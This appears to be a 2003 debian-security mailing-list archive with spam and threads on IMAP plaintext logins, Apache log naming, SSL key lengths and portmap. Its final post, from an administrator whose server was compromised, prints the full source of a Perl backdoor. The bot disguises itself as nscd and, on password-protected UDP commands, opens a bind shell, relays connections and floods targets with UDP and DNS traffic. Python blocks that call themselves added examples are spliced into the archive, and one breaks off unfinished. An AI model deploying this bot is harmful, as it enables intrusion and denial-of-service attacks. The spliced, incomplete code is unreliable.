Good morning debian-security

2003-06-10 Thread kandrak


Message to debian-security@lists.debian.org 

Hello
debian-security
WE WON THE AWARD FOR BEST SITE IN THE INDUSTRY
==We are operating in a New Format==

Check it out at:
 escuta21.kit.net or
http://www.escuta21.kit.net

hey debian-security
Be careful what you say on your cell phone...
it has ears too...

to remove debian-security@lists.debian.org from our list,
reply to this e-mail with the word "remover"
forgive us the inconvenience... ok?

kandrak



IMAP is too secure...

2003-06-10 Thread Hobbs, Richard
Hello,

I think my IMAP server has become too secure... I'm using the current
version of "uw-imapd" and "libc-client2003debian", as listed in stable and
stable-proposed-updates.

I cannot log into my IMAP server any more... It keeps saying Invalid
password. I can only assume it's using password encryption, but I don't
know how to turn it off.

It was never turned on before, but since the upgrade I've been unable to
retrieve my mail through IMAP. It usually asks in the config whether I
want clear-text passwords enabled or not, but it wasn't an option this
time.

Any ideas? I really need to get at the mail.

Thanks in advance...

Hobbs.

--
Richard Hobbs <[EMAIL PROTECTED]>
http://mongeese.co.uk | http://unixforum.co.uk

"There's only one way of life, and that's your own" - The Levellers

Registered Linux User: 313906
_
Send all your jokes to [EMAIL PROTECTED] !!
To subscribe, email: [EMAIL PROTECTED]




apache

2003-06-10 Thread Martynas Domarkas
Hi. I would like to use date string in apache log file names. Is there a
way to use some directive in httpd.conf to be parsed as shell command
like `date +%Y%m%d` or some other way to solve the problem? I will use
logrotate mechanism of debian, and this date string could be used only
for file creation after apache process receives SIGUSR1.





-- 
Pagarbiai
IT sistemų administratorius
Martynas Domarkas
tel.: +370 698 44331




Re: apache

2003-06-10 Thread Jamie Heilman
Martynas Domarkas wrote:
> Hi. I would like to use date string in apache log file names. Is there a
> way to use some directive in httpd.conf to be parsed as shell command
> like `date +%Y%m%d` or some other way to solve the problem? I will use
> logrotate mechanism of debian, and this date string could be used only
> for file creation after apache process receives SIGUSR1.

Grab the cronolog package, it's easier and less intrusive.

-- 
Jamie Heilman   http://audible.transient.net/~jamie/
"We must be born with an intuition of mortality.  Before we know the words
 for it, before we know there are words, out we come bloodied and squalling
 with the knowledge that for all the compasses in the world, there's only
 one direction, and time is its only measure."  -Rosencrantz



Re: apache

2003-06-10 Thread Martynas Domarkas
An, 2003-06-10 12:01, Jamie Heilman rašė:
> Martynas Domarkas wrote:
> > Hi. I would like to use date string in apache log file names. Is there a
> > way to use some directive in httpd.conf to be parsed as shell command
> > like `date +%Y%m%d` or some other way to solve the problem? I will use
> > logrotate mechanism of debian, and this date string could be used only
> > for file creation after apache process receives SIGUSR1.
> 
> Grab the cronolog package, it's easier and less intrusive.
> 
> -- 
> Jamie Heilman   http://audible.transient.net/~jamie/
> "We must be born with an intuition of mortality.  Before we know the words
>  for it, before we know there are words, out we come bloodied and squalling
>  with the knowledge that for all the compasses in the world, there's only
>  one direction, and time is its only measure."-Rosencrantz


Thanks, but I really do not like installation of another packages. There
must be a way to do this with apache configuration.


-- 
Pagarbiai
IT sistemų administratorius
Martynas Domarkas
tel.: +370 698 44331




Re: apache

2003-06-10 Thread Teun Vink
On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
[...]
> 
> Thanks, but I really do not like installation of another packages. There
> must be a way to do this with apache configuration.

You could add a line to your /etc/logrotate.d/apache configuration, 
so it would look something like this:

[...]
   postrotate
      /etc/init.d/apache reload > /dev/null
      mv -f $1.0 $1.`date +"%Y-%m-%d"`
   endscript
[...]

This would rename access.log.0 to access.log.2003-06-10


Regards,


Teun Vink



Re: apache

2003-06-10 Thread Martynas Domarkas
An, 2003-06-10 12:56, Teun Vink rašė:
> On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
> [...]
> > 
> > Thanks, but I really do not like installation of another packages. There
> > must be a way to do this with apache configuration.
> 
> You could add a line to your /etc/logrotate.d/apache configuration, 
> so it would look something like this:
> 
> [...]
>    postrotate
>       /etc/init.d/apache reload > /dev/null
>       mv -f $1.0 $1.`date +"%Y-%m-%d"`
>    endscript
> [...]
> 
> This would rename access.log.0 to access.log.2003-06-10
> 
> 
> Regards,
> 
> 
> Teun Vink
> 

Thanks a lot. This is nice solution, but I still like apache do the job,
and let logrotate simply rotate /var/log/apache/*.log. I feel like I have
seen somewhere some piece of shell command in httpd.conf.


-- 
Pagarbiai
IT sistemų administratorius
Martynas Domarkas
tel.: +370 698 44331




Re[2]: apache

2003-06-10 Thread Dominik Schulz
Perhaps I've got you wrong but wouldn't
--- snip ---
TransferLog "| /usr/sbin/rotatelogs /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800"
--- end ---
do it?

Martynas Domarkas <[EMAIL PROTECTED]> wrote on 10 Jun 2003 13:02:55 +0300:

> An, 2003-06-10 12:56, Teun Vink rašė:
> > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
> > [...]
> > > 
> > > Thanks, but I really do not like installation of another packages. There
> > > must be a way to do this with apache configuration.
> > 
> > You could add a line to your /etc/logrotate.d/apache configuration, 
> > so it would look something like this:
> > 
> > [...]
> >    postrotate
> >       /etc/init.d/apache reload > /dev/null
> >       mv -f $1.0 $1.`date +"%Y-%m-%d"`
> >    endscript
> > [...]
> > 
> > This would rename access.log.0 to access.log.2003-06-10
> > 
> > 
> > Regards,
> > 
> > 
> > Teun Vink
> > 
> 
> Thanks a lot. This is nice solution, but I still like apache do the job,
> and let logrotate simply rotate /var/log/apache/*.log. I feel like I have
> seen somewhere some piece of shell command in httpd.conf.
> 
> 
> -- 
> Pagarbiai
> IT sistemų administratorius
> Martynas Domarkas
> tel.: +370 698 44331
> 
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


Mit freundlichen Gruessen / Best regards
Dominik Schulz



RE: OPENSSL

2003-06-10 Thread Reckhard, Tobias
> I'm trying to generate a 40-bit certificate using OPENSSL.Can 
> anybody tell me if this is possible and with which package?

The RSA keys used in X.509 certificates are typically 1024 or 2048 bits in
length. What length the symmetric key used between two parties that have
authenticated via X.509 certificates (with RSA keys) to subsequently protect
their communication has, is not directly related to the certificate.

There are web browsers that will negotiate 128 bits only if the certificate
presented by the web server is a "step-up certificate". I'm not sure what
makes a certificate a step-up certificate, however, nor if this restriction
still applies to current browsers.

Cheers,
Tobias



Re: OPENSSL

2003-06-10 Thread Berin Lautenbach


Reckhard, Tobias wrote:

> There are web browsers that will negotiate 128 bits only if the
> certificate presented by the web server is a "step-up certificate".
> I'm not sure what makes a certificate a step-up certificate, however,
> nor if this restriction still applies to current browsers.


The step up involved the browser checking the signer was a legitimate CA
to sign a step-up cert and then performing the re-negotiation. The
restriction disappeared when the crypto export laws were all relaxed. You
have to go a fair way back (few years) to get a browser that still only
supports 128bit symmetric in SGC mode.

Cheers,
Berin




Re: Re[2]: apache

2003-06-10 Thread Martynas Domarkas
An, 2003-06-10 13:46, Dominik Schulz rašė: 
> Perhaps I've got you wrong but wouldn't
> --- snip ---
> TransferLog "| /usr/sbin/rotatelogs /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800"
> --- end ---
> do it?
> 
> Martynas Domarkas <[EMAIL PROTECTED]> wrote on 10 Jun 2003 13:02:55 +0300:
> 
> > An, 2003-06-10 12:56, Teun Vink rašė:
> > > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
> > > [...]
> > > > 
> > > > Thanks, but I really do not like installation of another packages. There
> > > > must be a way to do this with apache configuration.
> > > 
> > > You could add a line to your /etc/logrotate.d/apache configuration, 
> > > so it would look something like this:
> > > 
> > > [...]
> > >    postrotate
> > >       /etc/init.d/apache reload > /dev/null
> > >       mv -f $1.0 $1.`date +"%Y-%m-%d"`
> > >    endscript
> > > [...]
> > > 
> > > This would rename access.log.0 to access.log.2003-06-10
> > > 
> > > 
> > > Regards,
> > > 
> > > 
> > > Teun Vink
> > > 
> > 
> > Thanks a lot. This is nice solution, but I still like apache do the job,
> > and let logrotate simply rotate /var/log/apache/*.log. I feel like I have
> > seen somewhere some piece of shell command in httpd.conf.
> > 
> > 
> > -- 
> > Pagarbiai
> > IT sistemų administratorius
> > Martynas Domarkas
> > tel.: +370 698 44331
> > 
> > 
> > 
> > -- 
> > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 
> 
> Mit freundlichen Gruessen / Best regards
> Dominik Schulz
> 

Yes, of course. But in this case I will invoke rotatelogs... I don't
like it.


-- 
Pagarbiai
IT sistemų administratorius
Martynas Domarkas
tel.: +370 698 44331




Re: IMAP is too secure...

2003-06-10 Thread Jelmer Barhorst
Hi Richard,

Since libc-client2003debian it's only possible to use an SSL connection. Most
clients support it, but if you really want to allow plaintext IMAP again,
please run 'dpkg-reconfigure libc-client2003debian' and answer Yes to
'Should plaintext passwords be enabled?'.

To enable it manually, create /etc/c-client.cf with the following contents:
--8<--
I accept the risk
set disable-plaintext nil
--8<--

A better solution would be to set your client to use SSL on port 993. The
only thing you still have to worry about are the certificates.

Jelmer


- Original Message -
From: "Hobbs, Richard" <[EMAIL PROTECTED]>
To: 
Sent: Tuesday, June 10, 2003 8:32 AM
Subject: IMAP is too secure...


> Hello,
>
> I think my IMAP server has become too secure... I'm using the current
> version of "uw-imapd" and "libc-client2003debian", as listed in stable and
> stable-proposed-updates.
>
> I cannot log into my IMAP server any more... It keeps saying Invalid
> password. I can only assume it's using password encryption, but I don't
> know how to turn it off.
>
> It was never turned on before, but since the upgrade I've been unable to
> retrieve my mail through IMAP. It usually asks in the config whether I
> want clear-text passwords enabled or not, but it wasn't an option this
> time.
>
> Any ideas? I really need to get at the mail.
>
> Thanks in advance...
>
> Hobbs.
>
> --
> Richard Hobbs <[EMAIL PROTECTED]>
> http://mongeese.co.uk | http://unixforum.co.uk
>
> "There's only one way of life, and that's your own" - The Levellers
>
> Registered Linux User: 313906
> _
> Send all your jokes to [EMAIL PROTECTED] !!
> To subscribe, email: [EMAIL PROTECTED]
>
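
The reply above describes a server that refuses plaintext logins unless c-client.cf re-enables them. One way to see which state a server is in is to read the capabilities it advertises on the cleartext port. The Python below is an added example, not part of the original message: LOGINDISABLED and STARTTLS are the standard IMAP capability names (RFC 3501 / RFC 2595), not taken from the thread, the function names are hypothetical and the server responses are constructed samples.

```python
import re

# Untagged "* CAPABILITY ..." response, or a greeting carrying a
# "[CAPABILITY ...]" response code.
_CAP_RE = re.compile(
    r"^\*\s+(?:(?:OK|PREAUTH)\s+\[CAPABILITY\s+([^\]]*)\]|CAPABILITY\s+(.*))",
    re.IGNORECASE,
)
# SASL mechanisms that transmit the password itself and so rely on TLS.
PLAINTEXT_SASL = ("AUTH=PLAIN", "AUTH=LOGIN")


def parse_capabilities(line):
    """Return the advertised capabilities as an upper-cased frozenset."""
    match = _CAP_RE.match(line.strip())
    if match is None:
        return frozenset()
    listed = match.group(1) if match.group(1) is not None else match.group(2)
    return frozenset(token.upper() for token in listed.split())


def assess_cleartext_port(caps):
    """Return (verdict, plaintext SASL mechanisms offered) for a port-143 session."""
    if not caps:
        return ("unknown", [])          # nothing parseable: make no claim
    offered = sorted(c for c in caps if c in PLAINTEXT_SASL)
    if "LOGINDISABLED" not in caps:
        # Server will take a password over the unencrypted connection.
        return ("plaintext-login-accepted", offered)
    if "STARTTLS" in caps:
        # Client must upgrade the connection before it may log in.
        return ("starttls-required", offered)
    # No login and no upgrade path on this port: use IMAP over SSL instead.
    return ("use-imaps-993", offered)


# Constructed sample responses (not captured from a real server).
GREETING_LOCKED = ("* OK [CAPABILITY IMAP4REV1 LITERAL+ STARTTLS LOGINDISABLED] "
                   "mail.example.org IMAP4rev1 server ready")
CAP_OPEN = "* CAPABILITY IMAP4REV1 IDLE NAMESPACE STARTTLS AUTH=PLAIN AUTH=LOGIN"
CAP_NO_TLS = "* CAPABILITY IMAP4REV1 LOGINDISABLED"

if __name__ == "__main__":
    for sample in (GREETING_LOCKED, CAP_OPEN, CAP_NO_TLS):
        print(assess_cleartext_port(parse_capabilities(sample)), "<-", sample)
```
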



Re: Default Apache install not fit for multiple domains/users

2003-06-10 Thread Stefan Neufeind
Thank you for the information. Am I right that php-scripts then would 
need an execute-bit set? Currently they don't have ...

On 9 Jun 2003 at 17:59, Jon wrote:

> On Mon, 2003-06-09 at 17:28, Phillip Hofmeister wrote:
> > -BEGIN PGP SIGNED MESSAGE-
> > Hash: SHA1
> > 
> > On Mon, 09 Jun 2003 at 09:35:49PM +0200, Stefan Neufeind wrote:
> > > But you mean starting with #! ?? How could I use the normal way of
> > > setting a cgi-handler for calling .php-files? Know what I mean?
> > > 
> > > Using Misc Binary-support (and therefore patching the kernel) seems
> > > no solution to me. Isn't there some way to make it work using
> > > Apache- features?
> > 
> > MISC Binary is not patching the kernel.  MISC Binary comes as an
> > option with the stock kernel.  You might have to compile your own
> > kernel (I don't know, I haven't used a stock Debian kernel in a VERY
> > long time...)
> > 
> 
> The binfmt_misc kernel module is included in the stock Debian kernels,
> AFAIK.  There is a nice package, binfmt-support (ala
> update-alternatives) that allows one to easily configure binfmt_misc:
> 
> 
> Package: binfmt-support
> Support for extra binary formats
> 
> The binfmt_misc kernel module, contained in versions 2.1.43 and later
> of the Linux kernel, allows system administrators to register
> interpreters for various binary formats based on a magic number or
> their file extension, and cause the appropriate interpreter to be
> invoked whenever a matching file is executed. Think of it as a more
> flexible version of the #! executable interpreter mechanism.
> 
> This package provides an 'update-binfmts' script with which package
> maintainers can register interpreters to be used with this module
> without having to worry about writing their own init.d scripts, and
> which sysadmins can use for a slightly higher-level interface to this
> module.



Re: OPENSSL

2003-06-10 Thread Stefan Neufeind
I'm using a 128-bit-cert. But browsers that support less encryption 
(e.g. IE that comes with WinNT4) can't access my SSL-pages because 
the encryption doesn't allow degradation. Is there any way to solve 
this prob? Using Apache with an official SSL-cert.

PS: This just came to my mind when you said "step-up" - cause in my 
case it would be a "step-down", right?

On 10 Jun 2003 at 21:49, Berin Lautenbach wrote:

> Reckhard, Tobias wrote:
> > There are web browsers that will negotiate 128 bits only if the
> > certificate presented by the web server is a "step-up certificate".
> > I'm not sure what makes a certificate a step-up certificate,
> > however, nor if this restriction still applies to current browsers.
> 
> The step up involved the browser checking the signer was a legitimate
> CA to sign a step-up cert and then performing the re-negotiation. The
> restriction disappeared when the crypto export laws were all relaxed.
> You have to go a fair way back (few years) to get a browser that still
> only supports 128bit symmetric in SGC mode.



re: strange broadcast packets

2003-06-10 Thread kuba . jakubik

Hello,

isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to dhcp 
requests from clients?


Carpe Noctem,

Kuba BIGHard Jakubik



unsubscibe

2003-06-10 Thread loretta whitehead
Hi, my name is Loretta. I got this really cool IncrediMail downloaded on my computer, but it does not work... I've tried everything. My email will come to the IncrediMail account but I cannot respond, so I don't want it any more. Can you please take it off so I can use my sbcglobal account again? I even had to sign up for a new email address just so I could respond to some of my e-mail. That's sad. PLEASE take it off.

Re: Default Apache install not fit for multiple domains/users

2003-06-10 Thread Jon
On Tue, 2003-06-10 at 08:24, Stefan Neufeind wrote:
> Thank you for the information. Am I right that php-scripts then would 
> need an execute-bit set? Currently they don't have ...
> 

Unfortunately, yes.  Otherwise you'll get a 500 Internal Server Error or
the likes.  

- Jon

-- 
[EMAIL PROTECTED]

Administrator, tgpsolutions
http://www.tgpsolutions.com




Re: Default Apache install not fit for multiple domains/users

2003-06-10 Thread Phillip Hofmeister
On Tue, 10 Jun 2003 at 05:24:59PM +0200, Stefan Neufeind wrote:
> Thank you for the information. Am I right that php-scripts then would 
> need an execute-bit set? Currently they don't have ...
> 

They will be treated like a normal binary file, so yes (that is,
if you want your scripts to work).  If on the other hand, you don't
want your sk|pt5 to work then you don't need to set the execute bit.

-- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
--
Excuse #67: Typo in the code 



Re: nautilus and portmapper port 111

2003-06-10 Thread Andreas Wüst
Hi Phillip

On Dienstag, 10-Jun-03 at 01:33:07, Phillip Hofmeister wrote:

> On Tue, 10 Jun 2003 at 12:20:10AM +0100, Andreas W?st wrote:
>> Hi
>> 
>> Although I can see no evidence for portmapper being run by issuing
>> "netstat -tu -l -ee -p", everytime nautilus is started it connects to
>> port 111, and even gets an answer from there. And even after this
>> connection, I can't see a server listening on port 111 via netstat.
>> 
>> What is going on here? If I block port 111 nautilus won't start.
>> 
>> How can I make sure portmapper is not being run, or at least only in
>> a controlled manner, say for nautilus?
> 
> 
> I usually use a netstat -apn (requires r00t).  It will show you all
> sockets (listening or otherwise) and what app owns them.  The -n makes
> it so it does not resolve the port numbers via /etc/service.

No matter if I try netstat -apn or netstat -atunp as someone pointed out
in private, it gives the same result as netstat -tu -l -ee -p, apart
from the established connections, namely there is nothing listening in
port 111.

Furthermore, package "portmap" is NOT installed, but there are working
connections via 111 when nautilus starts up..

-- 
Best wishes,
Andi



Re: strange broadcast packets

2003-06-10 Thread Andreas Wüst
Hi

> Hello,
> 
> isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to
> dhcp requests from clients?

No lan here.. !!

-- 
Best wishes,
Andi



Re: Re[2]: apache

2003-06-10 Thread Mark L. Kahnt
On Tue, 2003-06-10 at 09:49, Martynas Domarkas wrote:
> An, 2003-06-10 13:46, Dominik Schulz rašė: 
> > Perhaps I've got you wrong but wouldn't
> > --- snip ---
> > TransferLog "| /usr/sbin/rotatelogs /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800"
> > --- end ---
> > do it?
> > 
> > Martynas Domarkas <[EMAIL PROTECTED]> wrote on 10 Jun 2003 13:02:55 +0300:
> > 
> > > An, 2003-06-10 12:56, Teun Vink rašė:
> > > > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote:
> > > > [...]
> > > > > 
> > > > > Thanks, but I really do not like installation of another packages. There
> > > > > must be a way to do this with apache configuration.
> > > > 
> > > > You could add a line to your /etc/logrotate.d/apache configuration, 
> > > > so it would look something like this:
> > > > 
> > > > [...]
> > > >    postrotate
> > > >       /etc/init.d/apache reload > /dev/null
> > > >       mv -f $1.0 $1.`date +"%Y-%m-%d"`
> > > >    endscript
> > > > [...]
> > > > 
> > > > This would rename access.log.0 to access.log.2003-06-10
> > > > 
> > > > 
> > > > Regards,
> > > > 
> > > > 
> > > > Teun Vink
> > > > 
> > > 
> > > Thanks a lot. This is nice solution, but I still like apache do the job,
> > > and let logrotate simply rotate /var/log/apache/*.log. I feel like I have
> > > seen somewhere some piece of shell command in httpd.conf.
> > > 
> > > 
> > > -- 
> > > Pagarbiai
> > > IT sistemų administratorius
> > > Martynas Domarkas
> > > tel.: +370 698 44331
> > > 
> > > 
> > > 
> > > -- 
> > > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> > 
> > 
> > Mit freundlichen Gruessen / Best regards
> > Dominik Schulz
> > 
> 
> Yes, of course. But in this case I will invoke rotatelogs... I don't
> like it.
> 
> 
> -- 
> Pagarbiai
> IT sistemų administratorius
> Martynas Domarkas
> tel.: +370 698 44331

IIUC, you are wanting to control the file name applied to rotated logs
from Apache, but you seem to be of the belief that Apache itself is
rotating the log files. Unless this has been added since I last read
through the Apache configuration documentation, I don't remember
seeing the log rotation functionality being part of it (although I last
read through the documentation in entirety several years back.) It is
handled by a separate package, on Debian most commonly logrotate,
regardless of the name applied to the rotated file.
-- 
Mark L. Kahnt, FLMI/M, ALHC, HIA, AIAA, ACS, MHP
ML Kahnt New Markets Consulting
Tel: (613) 531-8684 / (613) 539-0935
Email: [EMAIL PROTECTED]




Re: strange broadcast packets

2003-06-10 Thread Phillip Hofmeister
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Tue, 10 Jun 2003 at 07:21:25PM +0100, Andreas W?st wrote:
> Hi
> 
> > Hello,
> > 
> > isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to
> > dhcp requests from clients?
> 
> No lan here.. !!

That IP address might be used by your cable modem service as an internal
management address to hand out IP addresses.  Or it might even be your
bridge (cable modem).  In either case.  This is not something to be
worried about.  In fact I made a special rule in my iptables so such
packets don't get logged.

Be well,

- -- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
- --
Excuse #34: Heavy gravity fluctuation move computer to floor rapidly 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQE+5iqFS3Jybf3L5MQRAvTTAJ9HjtzJ3VLuxePPG6Ph9ZOW9dYKgACfXpet
jjtqPu0j7Se0dWS2gwScG10=
=3kbY
-END PGP SIGNATURE-



unsubscribe

2003-06-10 Thread Johannes Kleinlercher






Re: nautilus and portmapper port 111

2003-06-10 Thread Chris Caldwell
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Andreas Wüst sent the following message Today:

AW>  No matter if I try netstat -apn or netstat -atunp as someone pointed out
AW>  in private, it gives the same result as netstat -tu -l -ee -p, apart
AW>  from the established connections, namely there is nothing listening in
AW>  port 111.

Have you tried "rpcinfo -p localhost" to see if Nautilus is
registering a connection to portmap? The newer Gnome installs
(gnomevfs) depend on fam, which depends on portmap. I don't
believe there is a direct dependency from core Nautilus to
portmap, but possibly some of the Nautilus extras or vfs extras
are causing the dependency.

- -- 
Chris Caldwell

Information Systems Coordinator, Enterprise Systems
Information Systems and Services, The George Washington University
caldwell @ gwu . edu | +1 202.994.4674 (w) | +1 202.409.0878 (c)
http://asclepius.tops.gwu.edu | GPG key ID: 0xE52D0BE8

"Formal education can rarely improve the character of a scoundrel."
- Derek Bok, Harvard University

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQE+5kId1YKAfuUtC+gRAiWJAJ9Cpr8WyWV061ppN9m6O1OXRmW9jwCfQHcl
AWB5FF7DcvK7wMCroRqdn5M=
=iqMD
-END PGP SIGNATURE-




a weird script worm uploaded via php with debian 3.0 ?

2003-06-10 Thread Robert Ebright
Hello,
I logged in to my server today to find that
/usr/sbin/ncsd was running about 50 copies,
since I don't have BIND installed, obviously
something was up...they were also running with
the user www-data...
After a little bit of research I found a new
crontab entry
File: /tmp/crontab.LYukbF
0 * * * * /tmp/.nscdrecover

this starts at
auth.log.0:Jun  6 17:00:01 debian PAM_unix[26934]: (cron) session opened for user www-data by (uid=0)
auth.log.0:Jun  6 17:00:02 debian PAM_unix[26934]: (cron) session closed for user www-data
and runs every hour

and under SYSLOG it starts

syslog.3:Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)
syslog.3:Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
syslog.3:Jun  6 16:27:34 debian crontab[26804]: (www-data) LIST (www-data)
syslog.3:Jun  6 16:27:34 debian crontab[26807]: (www-data) REPLACE (www-data)
syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)

so I found /tmp/.ncsdrecover and it looks like
some kind of port scanner/trojan

the contents are pasted below


#!/usr/bin/perl -w

$pass = "J9YcGEyNypkzI";
$str = 'Mess with the best - die like a
rest!'x1337;
use IO::Socket;
use IO::Select;
use POSIX;

sub redir
{
my $port = shift;
my $dest = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
$sa = IO::Socket::INET->new( Proto => "tcp",
Listen => 1, ReuseAddr => 1,   
LocalPort =>$port) or exit;
$sin = $sa->accept or exit;
close($sa);
alarm 0;
$sout = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $dest) or exit;$sin->autoflush(1);
$sout->autoflush(1);
$sel = IO::Select->new($sin, $sout);
while(@sock = $sel->can_read(180)) {
foreach $s(@sock) {
$buf = <$s>; exit unless($buf);
print $sout $buf if($s eq $sin);
print $sin $buf if($s eq $sout);
}}}

sub shell
{
my $port = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 1);
accept(X, S);
close(S);
alarm 0;
open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
}

sub udp
{
my $host = shift;
my $time = shift;
$sock = IO::Socket::INET->new(Proto =>
'udp', PeerAddr => $host,
PeerPort => int(rand 65535))
or exit;   
$sock->autoflush(1);$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
print $sock $str while(1);
}
}

sub ddns
{
my $host = shift;
my $time = shift;
$sock = new IO::Socket::INET->new(Proto
=> 'udp', PeerAddr => $host,
PeerPort => 53) or exit;
$sock->autoflush(1);
$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
while(1) {
my $s = int(rand(89)+10);
my $r1 = int(rand(89)+10);
my $r2 = int(rand(89)+10);
my $r3 = int(rand(89)+10);
my $r4 = int(rand(89)+10);
 
send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}

$0 = '/usr/sbin/nscd'.' 'x100;
exit if fork;
$SIG{ALRM} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';
$SIG{INT} = 'IGNORE';
$SIG{QUIT} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
open STDIN, "/dev/null";
open STDERR, ">/dev/null";
POSIX::setsid();

$csock = IO::Socket::INET->new(Proto => 'udp',
LocalPort => 1337, ReuseAddr => 1) or
exit;while($string =<$csock>)
{
chop($string);
my ($pw, $cmd, $arg1, $arg2) = split "
", $string;next unless($cmd);
next unless($arg1);
next unless(crypt($pw, $pass) eq $pass);
if ($cmd eq "ping") {
my $bsock =
IO::Socket::INET->new(Proto =>
'udp', PeerAddr => $arg1,
  PeerPort => $arg2,
ReuseAddr => 1) or
next;   
print $bsock"pong 
".`uname -mnrs`;
close $bsock;
} elsif ($cmd eq "die") {
exit if(crypt($arg1, $pass) eq $pass);
} elsif ($cmd eq "redir") {
redir($arg1, $arg2) unless(fork);
} elsif ($cmd eq "shell") {
shell($arg1) unless(fork);
} elsif ($cmd eq "udp") {
udp($arg1, $arg2) unless(fork);
} elsif ($cmd eq "ddns") {
ddns($arg1, $arg2) unless(fork);
}
}



A little history is that my server was hacked
with some trojan that was sending out SPAM and I
did a fresh reinstall with debian so I could
have automatic updates and the like. I copied
over a few of the home directories from the old
site. Then this all started after a user logged
in on Friday June 6th, first login at 14:16 ending
14:24; the script starts at 14:27


worldspe ftpd26405pm6-s104.amazon. Fri Jun
6 15:06 -
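
The log trail in the message above (the web server account replacing its own crontab, then cron running a file out of /tmp) is a pattern that can be checked for automatically. The Python below is an added example, not part of the original post: the list of service accounts, the list of temporary directories, the rule names and the function names are assumptions, and the sample lines are constructed in the same syslog format as the excerpts in the post.

```python
import re
from dataclasses import dataclass

# Assumption: accounts that have no business editing a crontab on this host.
SERVICE_ACCOUNTS = frozenset({"www-data", "nobody", "daemon"})
# Assumption: world-writable directories cron jobs should never run from.
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Matches cron/crontab syslog lines such as
#   Jun  6 16:27:28 host crontab[26798]: (www-data) REPLACE (www-data)
# and tolerates a leading "syslog.3:" file-name prefix left by grep.
LINE_RE = re.compile(
    r"^(?:[\w.\-]+:)?"
    r"(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s\d{2}:\d{2}:\d{2})\s+"
    r"(?P<host>\S+)\s+"
    r"(?P<prog>[^\s\[]+)\[(?P<pid>\d+)\]:\s+"
    r"\((?P<user>[^)]+)\)\s+"
    r"(?P<action>[A-Z]+)\s+"
    r"\((?P<detail>.*)\)\s*$"
)


@dataclass(frozen=True)
class Finding:
    rule: str
    user: str
    timestamp: str
    detail: str


def parse_line(line):
    """Return the fields of one cron/crontab syslog line, or None."""
    match = LINE_RE.match(line.strip())
    if match is None:
        return None
    record = match.groupdict()
    # "/USR/SBIN/CRON" and "cron" are the same daemon; normalise the name.
    record["prog"] = record["prog"].rsplit("/", 1)[-1].lower()
    return record


def detect(lines):
    """Flag crontab replacement by service accounts and cron jobs run from temp dirs."""
    findings = []
    replaced_by = set()  # service accounts already seen replacing their crontab
    for line in lines:
        record = parse_line(line)
        if record is None:
            continue
        user = record["user"]
        if record["prog"] == "crontab" and record["action"] == "REPLACE":
            if user in SERVICE_ACCOUNTS:
                replaced_by.add(user)
                findings.append(Finding("service-account-crontab-replace",
                                        user, record["ts"], record["detail"]))
        elif record["prog"] == "cron" and record["action"] == "CMD":
            words = record["detail"].split()
            if not words or not words[0].startswith(TEMP_DIRS):
                continue
            # Escalate when the same account installed a crontab earlier in the log.
            rule = ("persistence-via-crontab" if user in replaced_by
                    else "cron-exec-from-temp-dir")
            findings.append(Finding(rule, user, record["ts"], words[0]))
    return findings


# Constructed sample lines (host name, PIDs and paths are made up).
SAMPLE_LOG = """\
Jun  6 16:20:03 web01 crontab[26001]: (alice) REPLACE (alice)
syslog.3:Jun  6 16:27:27 web01 crontab[26795]: (www-data) LIST (www-data)
syslog.3:Jun  6 16:27:28 web01 crontab[26798]: (www-data) REPLACE (www-data)
Jun  6 16:30:01 web01 /USR/SBIN/CRON[26810]: (root) CMD (/usr/sbin/logrotate /etc/logrotate.conf)
syslog.3:Jun  6 17:00:01 web01 /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.hidden-job)
Jun  6 17:00:05 web01 sshd[27000]: Accepted password for alice from 192.0.2.10 port 4242 ssh2
""".splitlines()

if __name__ == "__main__":
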